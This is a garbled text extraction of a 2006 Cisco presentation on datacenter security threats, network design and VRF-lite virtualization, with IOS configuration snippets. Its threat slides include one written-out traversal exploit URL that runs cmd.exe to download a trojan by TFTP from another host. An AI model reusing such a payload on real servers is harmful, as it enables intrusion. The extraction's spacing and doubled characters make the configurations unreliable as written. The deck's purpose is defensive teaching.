Datacenter Security & V irtual iz ed A rch itecture
Franck Bonneau TSE, Data Center
f b o nneau @ c i s c o . c o m fb o n n e a u @
c is c o .c o m
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
1
Agenda � Datacenter Security Threats � Datacenter Desig n O v erv iew � Datacenter V irtual iz atio n
� C isco I P serv ice in v irtual iz ed architecture ex am p l es –V irtual iz ed central Firewall D ep lo y m ent ex am p le
– H o w A C E L o ad b alanc er h elp to s ec u re s erv er f arm . • HTTP inspection in action HTTP tunneling • HTTP inspection in action U
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
R L c a no nic a liz a tio n
2
D at a C ent er S ec u r i t y
Protecting the Enterprise Data � Who to protect applications from? E x t ernal threats from the Internet
Internet
I nt ernal threats from the Intranet
F rom P artner’s netw ork s ori g i nati ng attac k s
� What to protect applications from? Intru si on
D eni al of serv i c e W orms
� P rev ent the serv ers from b ecoming the sou rce of attack s ag ainst a third party entity
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
3
T y p i c al I nt r u s i o n S eq u enc e
Phase 1 : H ack ing the W eb / A ppl ication S erv er L ay er 2 S eg m ent HTTP
L ay er 2 S eg m ent
W eb W eb S erv er S erv er
W eb / A p p l i cat i on
D at ab as e
� A f ter a p h as e o f p ro b ing / s c anning , th e h ac k er d etec ts th e v u lnerab ility o f th e W eb / ap p lic atio n s erv er � T h e h ac k er ex p lo its th e v u lnerab ility to g et a s h ell � Fo r ex am p le:
C opy th e tr oj an on th e W eb / appl ication ser v er :
HTTPS: / / w w w . ex am pl e. com / scr ipts/ . . % c0 % af . . / w innt/ sy stem 3 2 / cm d . ex e? / c+ tf tp % 2 0 -i% 2 0 1 0 . 2 0 . 1 5 . 1 5 % 2 0 G E T% 2 0 tr oj an. ex e% 2 0 tr oj an. ex e F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
4
T y p i c al I nt r u s i o n S eq u enc e
Phase 1 : O b taining a R ev erse S hel l � B y u s ing v ario u s to o ls and ex p lo its th e h ac k er ev entu ally o b tains th e W eb s erv er s h ell � Fro m th is s h ell th e h ac k ef f ec tiv ely c o ntro ls th e W s erv er, wh ic h g iv es h im to th e o th er s erv ers in th c enter
H acker’s P C
er eb ac c es s e d ata
� O nc e th e h ac k er h as a s h ell f ro m th e W eb s erv er h e c an f o llo w two s trateg ies to ac c es s c o nf id ential d ata: 1 . Hack th e d atab ase 2 . S nif f th e tr af f ic
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
5
T y p i c al I nt r u s i o n S eq u enc e
Phase 2 —S trategy 1 : A ccessing the Datab ase L ay er 2 S eg m ent HTTP
L ay er 2 S eg m ent
W eb W eb S erv er S erv er
W eb / A p p l i cat i on
D at ab as e
� T h e h ac k er lo o k s f o r th e d atab as e s erv er, and if th e W eb / ap p lic atio n s erv ers are L ay er 2 ad j ac ent ( with d u al N I C s , f o r ex am p le) , th is is ex trem ely eas y � U s e a c o m m and line s c anner
� I d entif y th e v u lnerab ilities o f th e D B s erv er
� T h en o b tain th e s h ell o f th e d atab as e s erv er and d u m p th e d atab as e inf o rm atio n F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
6
T y p i c al I nt r u s i o n S eq u enc e
Phase 2 —S trategy 2 : S nif f ing the T raf f ic D a ta C e n te r D e fa u lt G a te w a y
U s e r Pa s s w o r d a n d C r e d i t C a r d In f o r m a t i o n
.1 N o r m a l Tr a f f i c Pa t h
Tr a f f i c Pa t h i n Pr e s e n c e o f A R P Po i s o n i n g
1 9 2 .1 6 8 .1 0 .0 /2 4
I’m
.1 Tr o j a n
Se r v e r A .5 F b o n n e a u -a s a
Se r v e r B .4
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
Se r v e r C .3 C is c o C o n fid e n tia l
Se r v e r D .2 7
D eni al o f S er v i c e At t ac k s DoS and DDoS
� Do Ses are m eant to d eny access to autho riz ed users and co nsum e enterp rise reso urces: B and wid th C P U
�
�
�
�
�
�
� The hack er can util iz e co m p ro m ised P C s/ serv ers that b eco m e Z o m b ies o r B o ts to l aunch the attack ( DDo S)
�
M em o ry b lo c k s
V u l nera b i l i ti es m o s t u s u a l l y ex p l o i ted b y b o ts to s p rea d a re W eb s erv ers ( IIS a nd A p a c h e) , W i nd o w s R P C , S Q L s erv er a nd M y S Q L , W IN S a nd o p en d o o rs u s ed b y th e a l terna ti v es o f B a g l e a nd M y d o o m . F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
W eb Serv er W eb Serv er 8
D eni al o f S er v i c e At t ac k s S ou rce I P S poof ing ( 1 )
Source IP Spoofing Is Used to:
S rc IP = 1 0 . 2 0 . 5 . 0
� H id e th e s o u rc e:
S o th e attack er or r esou r ce is not r ev eal ed
� B y p as s s ec u rity :
M asq u er ad ing as v al id pack ets
e. g . 1 0 . 2 0 . 5 . 0 can tal k to 1 0 . 2 0 . 1 0 . 0 , and b y d ef au l t d ir ect access to 1 0 . 2 0 . 1 0 . 0 is d enied
B y spoof ing th e sou r ce I P th e h ack er can attack th e netw or k 1 0 . 2 0 . 1 0 . 0
� M as q u erad e as th e real targ et:
Tu r ns th e “v ictim ” into an ag ent of th e r eal attack
� C o ns u m e netwo rk res o u rc es : C r eate tr ansl ations/ f l ow s on l oad b al ancer s or f ir ew al l s
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
1 0 .2 0 .5 .0
1 0 .2 0 .1 0 .0 9
D eni al o f S er v i c e At t ac k s S ou rce I P S poof ing ( 2 )
Source IP Spoofing Is Used to: � H id e th e s o u rc e:
S erv erf a rm
S o th e attack er or r esou r ce is not r ev eal ed
SY N
� B y p as s s ec u rity :
M asq u er ad ing as v al id pack ets
� M as q u erad e as th e real targ et:
A C K
1 9 2 .1 6 8 .2 .0 /2 4
Tu r ns th e “v ictim ” into an ag ent of th e r eal attack , e. g . S Y N r ef l ector
1 0 .5 6 .3 2 .1
� C o ns u m e netwo rk res o u rc es : C r eate tr ansl ations/ f l ow s on l oad b al ancer s or f ir ew al l s
D es t: 1 9 2 . 1 6 8 . 2 . 2 5 5 S o u rc e: 1 0 . 5 6 . 3 2 . 1 A tta c k er 1 9 2 .0 .2 .1 5 0
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
10
D eni al o f S er v i c e At t ac k s S ou rce I P S poof ing ( 3 )
Source IP Spoofing Is Used to: � H id e th e s o u rc e:
S o th e attack er or r esou r ce is not r ev eal ed
� B y p as s s ec u rity :
Po t e n t i a l V i c t i m s
M asq u er ad ing as v al id Packets
� M as q u erad e as th e real targ et:
Tu r ns th e “v ictim ” into an ag ent of th e r eal attack
� C o ns u m e netwo rk res o u rc es : C r eate tr ansl ations/ f l ow s on l oad b al ancer s or f ir ew al l s
Th e com pr om ised h osts cy cl es m u l tipl e sou r ce I P ad d r esses to ex h au st netw or k r esou r ces
IP 1 IP 2
IP 3
1 0 .2 0 .5 .0 F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
1 0 .2 0 .1 0 .0 11
W o rm s
Ef f ects on S erv ers and N etw ork E f f ect o n the N etw o rk I nf rastructure:
E f f ect o n the Serv ers
� H i g h C P U ( thread c reati on, sc anni ng )
� R and om sc anni ng for v u l nerab l e hosts, i nc l u d i ng the R out er P roces s ors
� A p p l i c ati ons i mp ac ted
� Inc reased traffi c : netw ork l i nk s ov erl oad ed
D a ta C e n te r Sy s t e m U n d e r A tta c k
Si Si
Si
A c c e s s F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C o re
Si
In f e c t e d So u r c e
A g g r e g a tio n C is c o C o n fid e n tia l
12
W h at ar e t h e s o l u t i o ns ???
� In first, enforce the Datacenter Infrastructure
–L ev el 2 S ecuri t y ( A C L , D A I , uR P F, D H C P S noop i ng , P V L A N , P ort S ecuri t y , S ource G uard …. ) –P rot ect C ont rol P l ane ( C oP P - C ont rol P l ane P ol i ci ng ) –...
� P rotect Datacenter ag ainst DoS & DDoS –D –R –D S w –D –D
et ect i on w i t h N et f l ow / S y s l og s / C S -M A R S em ot e T ri g g ered Bl ack H ol e ( S ource Bas ed , D es t i nat i on Bas ed ) eni al of S erv i ce M i t i g at i on w i t h Fi rew al l s , L oad Bal ancers and i t ch es / R out ers , A cces s C ont rol L i s t s , R at e L i m i t i ng / P ol i ci ng oS and D D oS M i t i g at i on w i t h t h e C i s co G uard at a C ent er D es i g n f or D oS and D D oS p rot ect i on
� Datacenter seg m entation
– U s e v i rt ual i z i ng t ech nol og i es – C ont rol t raf i c b et w een « V P N » us i ng FW , I P S , W eb FW
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
13
Agenda � Datacenter Security Threats � Datacenter Desig n O v erv iew � Datacenter V irtual iz atio n
� C isco I P serv ice in v irtual iz ed architecture ex am p l es –V irtual iz ed central Firewall D ep lo y m ent ex am p le
– H o w A C E L o ad b alanc er h elp to s ec u re s erv er f arm . • HTTP inspection in action HTTP tunneling • HTTP inspection in action U
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
R L c a no nic a liz a tio n
14
D at a C ent er S w i t c h i ng Data Center Layout
Data Data Centers Centers tyty p p i i c c alal l l y y c c o o m m p p riri se se thth ree ree f f u u ncnc titi o o nal nal l l ayay ers… ers…
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
15
D at a C ent er D es i gn
Core Des i g n Cons i d erati ons U se of E th erc h annel to inc rease resil ienc y u sing L4 op tion in h ash
Layer 2 extension to Core not rec om m end ed
A Catalyst 6500 deployed in the c or e su ppor ts the f ollow ing k ey tec hnolog ies…
P ref er Layer 3 on al l interf ac es
•1 0G E P or t D ensity •D istr ib u ted F or w ar ding •E CM P •I P M u ltic ast •L ow L atenc y S w itc hing •M u ltiple I G P S u ppor t •( O S P F / E I G R P / I S -I S ) •H S R P / V R R P and G L B P •V R F -L ite
U se I G P au th entic ation to sec u re ad j ac enc ies
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
S u m m ariz e ag g reg ation rou tes to c ore
C is c o C o n fid e n tia l
16
D i s t r i b u t i o n/ Aggr egat i o n L ay er 1 0 G E D ensity S p anning T ree S p anning T ree E xtensions H S R P / V R R P and G LB P I nteg rated S erv ic es V R F E th erc h annel E CM P
A Catal yst 6 5 0 0 d ep l oyed in th e A g g reg ation Layer su p p orts th e f ol l ow ing k ey tec h nol og ies…
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
17
L ay er 2 D i s t r i b u t i o n R edunda nt L ink from H SR P A c ti v e & STP R o o t V L A N 2 0 ,1 4 0
Si
Layer 2 Li n k s
1 0 .1 .2 0 .0 1 0 .1 .1 2 0 .0
A ccess L a y er is b l ock ed
Layer 2 Tru nk
Si
A cces s 1 0 .1 .4 0 .0 1 0 .1 .1 4 0 .0
• U se onl y i f L ay er 2 V L A N
D i s t ri b ut i on
Layer 2 Li n k s
S T P M od el
V L A N 2 0 Data V L A N 1 2 0 V o ic e
H SR P A c ti v e & STP R o o t V L A N 4 0 ,1 2 0
V L A N 4 0 Data V L A N 1 4 0 V o ic e
sp anni ng fl ex i b i l i ty req u i red
• S T P c onv erg enc e req u i red for u p l i nk fai l u re / rec ov ery
• M ore c omp l ex as S T P R oot and H S R P shou l d matc h
• D i stri b u ti on to D i stri b u ti on L i nk req u i red for rou te su mmari z ati on F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
18
L ay er 3 D i s t r i b u t i o n
N o Spa nning T ree – a l l l ink s a ctiv e H SR P A c ti v e V L A N 2 0 ,1 4 0
Layer 2 Li n k s
1 0 .1 .2 0 .0 1 0 .1 .1 2 0 .0
Layer 3 Si
Si
H S R P / G L BP M od el V L A N 2 0 Data V L A N 1 2 0 V o ic e
1 0 .1 .4 0 .0 1 0 .1 .1 4 0 .0
H SR P A c ti v e V L A N 4 0 ,1 2 0
D i s t ri b ut i on Layer 2 Li n k s
V L A N 4 0 Data V L A N 1 4 0 V o ic e
A cces s
• R ec ommend ed ‘B est P rac ti c e’ – T ri ed and T ru e • F u l l y u ti l i z e U p l i nk s v i a G L B P
• N o S T P c onv erg enc e req u i red for u p l i nk fai l u re/ rec ov ery
• D i stri b u ti on to D i stri b u ti on L i nk req u i red for rou te su mmari z ati on • M ap L 2 v l an nu mb er to L 3 su b net for ease of u se/ manag ement F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
19
R o u t i ng t o t h e E dge
L a y er 3 D istrib ution w ith L a y er 3 A ccess E IG R P /O S P F
E IG R P /O S P F Si
E IG R P /O S P F 10.1.20.0 10.1.120.0
Si
G L BP M od el V L A N V L A N
20 D a t a 120 V o i c e
10.1.4 0.0 10.1.14 0.0
E IG R P /O S P F
Layer 3 Layer 3 Layer 2 Layer 2
V L A N 4 0D a ta V L A N 14 0 V o i c e
� M o v e th e L ay er 2 / 3 d em arc atio n to th e netwo rk ed g e
� U p s tream c o nv erg enc e tim es trig g ered b y h ard ware d etec tio n o f lig h t lo s t f ro m u p s tream neig h b o r � B enef ic ial f o r th e rig h t env iro nm ent F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
20
R o u t i ng t o t h e E dge
Advantages, Yes in the Right Environment � E ase of i mp l ementati on, l ess to g et ri g ht No matching of STP/HSRP/GLBP p r ior ity No L2 /L3 M u l ticas t top ol ogy incons is te ncie s
� S i ng l e C ontrol P l ane and w el l k now n tool set � M S � E � O � R
tr ace r ou te , s how ip r ou te , s how ip e igr p ne ighb or , e tc. …
c d H
F b o n n e a u -a s a
ost C atal y sts su p p ort L 3 w i tc hi ng tod ay IG R P c onv erg es i n < 2 0 0 msec S P F w i th su b -sec ond tu ni ng onv erg es i n < 2 0 0 msec P V S T + c onv erg enc e ti mes ep end ent on G L B P / S R P tu ni ng ©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
2
Both L2 and L3 Can Provide S u b -S ec ond Converg enc e
1. 8 1. 6
U p s tr e a m
1. 4
D o w n s tr e a m
1. 2 1 0. 8 0. 6 0. 4 0. 2 0
R P V S T +
O S P F 12. 2S
E IG R P 21
I nc r eas i ng H A i n t h e D at a C ent er F ail over: W hat is the T ime to B eat? � T h e o v erall f ailo v er tim e is th e c o m b inatio n o f c o nv erg enc e at L 2 , L 3 , + L 4 c o m p o nents
S tatef u l d ev ices can r epl icate connection inf or m ation and ty pical l y f ail ov er w ith in 3 -5 sec
E th er C h annel s < 1 sec
S TP conv er g es in ~ 1 sec ( 8 0 2 . 1 w ) HS R P can b e tu ned to < 1 s
Failover Time
� W h ere d o es T C P b reak ? L inu x , A I X, etc .
F b o n n e a u -a s a
L 2C o n v e r g e n c e
M ic ro s o f t,
L 3 C o n v e rg e n c e
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
L 4 C o n v e rg e n c e ~ 5 s
M ic r o 2003 T C P T o le ~
s o ft S e rv S ta c ra n c 9 s
X P e r k e
L in u O th e rs a L o O u
x a T o n g ta g
n d le r a te e r e
22
I nc r eas i ng H A i n t h e D at a C ent er
Failover Time
F ail over T ime C omp arison � � � � � � �
ST P -8 0 2 .1 w—O ne s ec O SP F-E I G R P —O ne s ec A C E M o d u le with A u to s tate H SR P —T h ree s ec ( u s ing 1 / 3 ) FW SM M o d u le—T h ree s ec C SM M o d u le—Fiv e s ec W inXP / 2 0 0 3 Serv erT C P Stac k —N ine s ec
OSPF/EIGRP Su b -s e c o n d
F b o n n e a u -a s a
Sp a n n i n g T r e e ~ 1 s e c
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
A C E ~ 1 s
C is c o C o n fid e n tia l
H SRP ~ 3 s (m a y b e tu n e d to le s s )
Fi r e Se r M o ~
W a ll v ic e d u le 3 s
C o n te n t Se r v i c e M o d u le ~ 5 s
T C P St a c k T o le r a n c e ~ 9 s
23
G l ob al L 3 arc hitec tu re – W here I nstal l I P S ervic es ( F W , I P S , . . ) ? ? ?
L3
Access D i st r i b u t i o n
Co r e
I nt ernet
? L3
D i st r i b u t i o n Access
?
Layer 3
?
?
M od ul ar, h i erarch i cal � S C A L A BL E y et not v i rt ual i z ed F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
?
? 24
Agenda � Datacenter Security Threats � Datacenter Desig n O v erv iew � Datacenter V irtual iz atio n
� C isco I P serv ice in v irtual iz ed architecture ex am p l es –V irtual iz ed central Firewall D ep lo y m ent ex am p le
– H o w A C E L o ad b alanc er h elp to s ec u re s erv er f arm . • HTTP inspection in action HTTP tunneling • HTTP inspection in action U
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
R L c a no nic a liz a tio n
25
P r o b l em
D ef i ni t i o n - D r i v er s
� C l o sed U ser G ro up creatio n
P riv ate, Sec u re & I nd ep end ent
O v er a s h ared inf ras tru c tu re � T rans p arenc y E nab le U s er M o b ility � P ro d u c tiv ity G ains
� C entral iz atio n o f P o l icies and Serv ices
P o lic ies b as ed o n g ro u p s � Sim p lif ied D ep lo y m ent
E nh anc ed M anag eab ility � L o wer O p eratio nal C o s ts
� Sharing o f N etw o rk I ntel l ig ence/ Serv ices
C o s tly res o u rc es c entrally s erv e all g ro u p s wh ile m aintaining p riv ac y
e.g . D ata C enter FW , I P S, P ro x y , W eb FW , ….
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
26
… w i t h C ent r al i z ed S er v i c es & P o l i c i es � Serv ic es no t d u p lic ated p er g ro u p � E c o no m ic al
� E f f ic ient and M anag eab le
Internet / S h a red
� P o lic ies C entrally D ep lo y ed
R es ou rc e 1 0 .2 /1 6 DC Core
S h a r ed f o r a l l g r o u p s: Internet G a tew a y
Con t ra c t or 1 0 .2 /1 6
V i d eo S erv er
P a rtn e rs
F i rew a l l a nd N A T
C o n tra c to rs
H o s ted C o ntent
Con t ra c t or 1 0 .3 /1 6
R e s o u rc e s
D H C P
E m p lo y e e s
IP S ec G a tew a y F b o n n e a u -a s a
P a rt n er 1 0 .2 /1 6
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
27
Access
I nt ernet
L2 / L3
Co r e
Layer 3
D i st r i b u t i o n
L2 / L3
C u r r ent D at ac ent er D es i gn R ec o m m endat i o n
M od ul ar, h i erarch i cal � S C A L A BL E y et not v i rt ual i z ed F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
28
A V i r t u al N et w o r k p er G r o u p
A cces s D i s t ri b ut i on C ore
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
29
V i r t u al i z at i o n Al t er nat i v es
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
30
D at ac ent er V P N
O p t i o ns
� Seg m entatio n at L ayer 2 V L A N s
� Seg m entatio n at L ayer 3 A C L s o rG R E
� Datacenter L 3 V P N
M P L SL 3 V P N s V R F-lite V L A N s m ap p ed to V P N s to “ex tend ” V P N s o v er L 2 d o m ains and b etween V R F-lite ro u ters
� Datacenter V P N = L 2V L A N + L 3 V P N = end -2-end F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
31
D at ac ent er V P N – V R F L i t e Vl a n 1 0 0
Vl a n 1 0 1
V R FV P N 1
Vl a n 2 0 1
V R FV P N 2 Vl a n 2 0 0
Vl a n 3 0 3
V R F V P N -S E R V E R S Vl a n 3 0 4
Vl a n 3 0 1 F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
Vl a n 3 0 2 32
A
V R F -l i t e
V irtua l R outer I P s w i t ch i ng
I P s w i t ch i ng
8 0 2 .1 q
8 0 2 .1 q V R F V R F V R F
S V I or s ub -i nt erf ace ( L ay er 3 ) F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
S V I or s ub -i nt erf ace ( L ay er 3 ) 33
V R F L ite
R outers – R outers Intera ction SW1
S V Io r s u b -i nterf a c e ( L a y er 3 )
S V Io r s u b -i nterf a c e ( L a y er 3 )
P E -V R F
C E -V R F
P E -V R F
C E -V R F
P E -V R F
8 0 2 .1 q
8 0 2 .1 q
T o A cces s V R Fs m ap toV L A N s
F b o n n e a u -a s a
SW2
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
V R Fs p eer ov er s ep arat e rout i ng i ns t ances C is c o C o n fid e n tia l
C E -V R F
S V Io r s u b -i nterf a c e ( L a y er 3 )
8 0 2 .1 q
T o A cces s V R Fs m ap toV L A N s
34
U s i ng V R F -L i t e E nd-t o -E nd ex am p l e � L 2 A ccess
� U sing V R F -l ite o nl y
V R F-lite at C o re and D is trib u tio n
� R o uted sub -interf aces b etw een sw itches �N o B G P o rM P L S
M P L S lab els s u b s titu ted b y 8 0 2 .1 q tag s end -to -end E v ery link is a 8 0 2 .1 q tru nk O ne s u b -interf ac e p er V R F
� R estricted Scal ab il ity
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
35
8 0 2 . 1 q t ags end-t o -end Trunk with s witc hp o rt
1–V R F D e fin itio n s R o u te D is tin g u is h e r a n d R o u te ta rg e t Ca t 4 5 0 0
Ca t 65 0 0
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
ip ip v r rd d r ro ou !! ip ip v r rd d r ro ou !! ip ip v r rd d r ro ou !!
vr rf f V VP 3 3: :3 3 u t t e e -t-t a
P N N -S-S E E R R V V E E R R S S
vr rf f V VP 1 1: :1 1 u t t e e -t-t a
PN N1 1
vr rf f V VP 2 2: :2 2 u t t e e -t-t a
PN N2 2
a r r g g e e t t e e x x popo r r t t 3 3 : : 3 3
a r r g g e e t t e e x x popo r r t t 1 1 : : 1 1
a r r g g e e t t e e x x popo r r t t 2 2 : : 2 2
36
8 0 2 . 1 q t ags end-t o -end Trunk with s witc hp o rt 2 a -L in k s b e tw e e n r o u te r s d e fin e d a s L 2 T r u n k w ith S w itc h p o r ts Ca t 4 5 0 0
2 0 0 0 -2 0 0 3
Ca t 65 0 0
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
Cat4500 Cat4500 interface interface GigabitEthernet1/1 GigabitEthernet1/1 d d eses crip crip tio tio nn ----- T T o o C C at6 at6 5 5 0 0 0 0 -1 -1 ----s s w w itchp o rt tru nk encap s u l atio n itchp o rt tru nk encap s u l atio n d d o o t1q t1q s s w w itchp o rt tru nk al l o w ed v l an 2 0 0 0 itchp o rt tru nk al l o w ed v l an 2 0 0 0 -2-2 0 0 0 0 3 3 s s w w itchp itchp o o rt rt m m o o d d ee tru tru nknk s s p p anning-tree p o rtfas anning-tree p o rtfas tt tru tru nknk !! interface interface V V l l an2 an2 0 0 0 0 0 0 d d eses crip crip tio tio nn ----- L L ink ink toto C C at6 at6 5 5 0 0 0 0 -1 -1 ipip adad d d res res s s 1010 . . 1414 9 9 . . 1212 . . 2 2 2 2 5 5 5 5 . . 2 2 5 5 5 5 . . 2 2 5 5 5 5 . . 0 0 ipip o o s s p p ff netw netw o o rkrk p p o o int-to int-to -p-p o o int int !! interface interface V V l l an2 an2 0 0 0 0 11 ipip v v rf rf fofo rwrw ard ard ing ing V V P P N N 11 ipip adad d d res res s s 1.1. 1.1. 1212 . . 2 2 2 2 5 5 5 5 . . 2 2 5 5 5 5 . . 2 2 5 5 5 5 . . 0 0 ipip o o s s p p ff netw netw o o rkrk p p o o int-to int-to -p-p o o int int !! interface interface V V l l an2 an2 0 0 0 0 2 2 ipip v v rf rf fofo rwrw ard ard ing ing V V P P N N 2 2 ipip adad d d res res s s 2 2 . . 2 2 . . 1212 . . 2 2 2 2 5 5 5 5 . . 2 2 5 5 5 5 . . 2 2 5 5 5 5 . . 0 0 ipip o o s s p p ff netw netw o o rkrk p p o o int-to int-to -p-p o o int int !! interface interface V V l l an2 an2 0 0 0 0 3 3 ipip v v rf rf fofo rwrw ard ard ing ing V V P P N N -S-S ERER V V ERER S S ipip adad d d res res s s 3 3 . . 3 3 . . 1212 . . 2 2 2 2 5 5 5 5 . . 2 2 5 5 5 5 . . 2 2 5 5 5 5 . . 0 0 ipip o o s s p p ff netw netw o o rkrk p p o o int-to int-to -p-p o o int int !! 37
8 0 2 . 1 q t ags end-t o -end Trunk with s witc hp o rt 2 b O r s u
-L in k s b e tw e e n r o u te r s d e fin e d a s L 3 T r u n k w ith b -i n t e r f a c e s Ca t 4 5 0 0
2 0 0 0 -2 0 0 3
Ca t 65 0 0
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
Cat6 Cat6 500 500 interface interface GigabitEthernet6 GigabitEthernet6 /1 /1 nono ipip adad d d res res s s !! interface interface GigabitEthernet6 GigabitEthernet6 /1. /1. 2 2 0 0 0 0 0 0 encap s u l atio n d o t1Q 2 0 0 0 encap s u l atio n d o t1Q 2 0 0 0 ipip adad d d res res s s 1010 . . 1414 9 9 . . 1212 . . 11 2 2 5 5 5 5 . . 2 2 5 5 5 5 . . 2 2 5 5 5 5 . . 0 0 ipip o o s s p p ff netw netw o o rkrk p p o o int-to int-to -p-p o o int int !! interface interface GigabitEthernet6 GigabitEthernet6 /1. /1. 2 2 0 0 0 0 11 encap s u l atio n d o t1Q 2 0 0 1 encap s u l atio n d o t1Q 2 0 0 1 ipip v v rf rf fofo rwrw ard ard ing ing V V P P N N 11 ipip adad d d res res s s 1.1. 1.1. 1212 . . 11 2 2 5 5 5 5 . . 2 2 5 5 5 5 . . 2 2 5 5 5 5 . . 0 0 ipip o o s s p p ff netw netw o o rkrk p p o o int-to int-to -p-p o o int int !! interface interface GigabitEthernet6 GigabitEthernet6 /1. /1. 2 2 0 0 0 0 2 2 encap encap s s u u l l atio atio nn d d o o t1Q t1Q 2 2 0 0 0 0 2 2 ipip v v rf fo rw ard ing rf fo rw ard ing V V P P N N 2 2 ipip adad d d res res s s 2 2 . . 2 2 . . 1212 . . 11 2 2 5 5 5 5 . . 2 2 5 5 5 5 . . 2 2 5 5 5 5 . . 0 0 ipip o o s s p p ff netw netw o o rkrk p p o o int-to int-to -p-p o o int int !! interface interface GigabitEthernet6 GigabitEthernet6 /1. /1. 2 2 0 0 0 0 3 3 encap s u l atio n d o t1Q 2 0 0 3 encap s u l atio n d o t1Q 2 0 0 3 ipip v v rf rf fofo rwrw ard ard ing ing V V P P N N -S-S ERER V V ERER S S ipip adad d d res res s s 3 3 . . 3 3 . . 1212 . . 11 2 2 5 5 5 5 . . 2 2 5 5 5 5 . . 2 2 5 5 5 5 . . 0 0 ipip o o s s p p ff netw netw o o rkrk p p o o int-to int-to -p-p o o int int !! 38
8 0 2 . 1 q t ags end-t o -end Trunk with s witc hp o rt
3–V L A N s M o v e V L A N s in th e ir r e s p e c tiv e V R F Ca t 4 5 0 0
2 0 0 0 -2 0 0 3
Ca t 65 0 0
F b o n n e a u -a s a
©2 0 0 6 C is c o S y s te m s , In c . A ll r ig h ts r e s e r v e d .
C is c o C o n fid e n tia l
!! i in nt i ip i ip !! i in nt i ip i ip !! !! i in nt i ip i ip !! i in nt i ip i ip !!
te p p
er v a
rf vr ad
fa rf dd
ac f dr
ce f re
e V Vl fo or rw es ss s
la wa 1
an ar 10
n1 rd 0.
11 di .1
10 in 1.
te p p
er v a
rf vr ad
fa rf dd
ac f dr
ce f re
e V Vl fo or rw es ss s
la wa 2
an ar 20
n1 rd 0.
12 di .1
20 in 1.
te p p
er v a
rf vr ad
fa rf dd
ac f dr
ce f re
e V Vl fo or rw es ss s
la wa 1
an ar 10
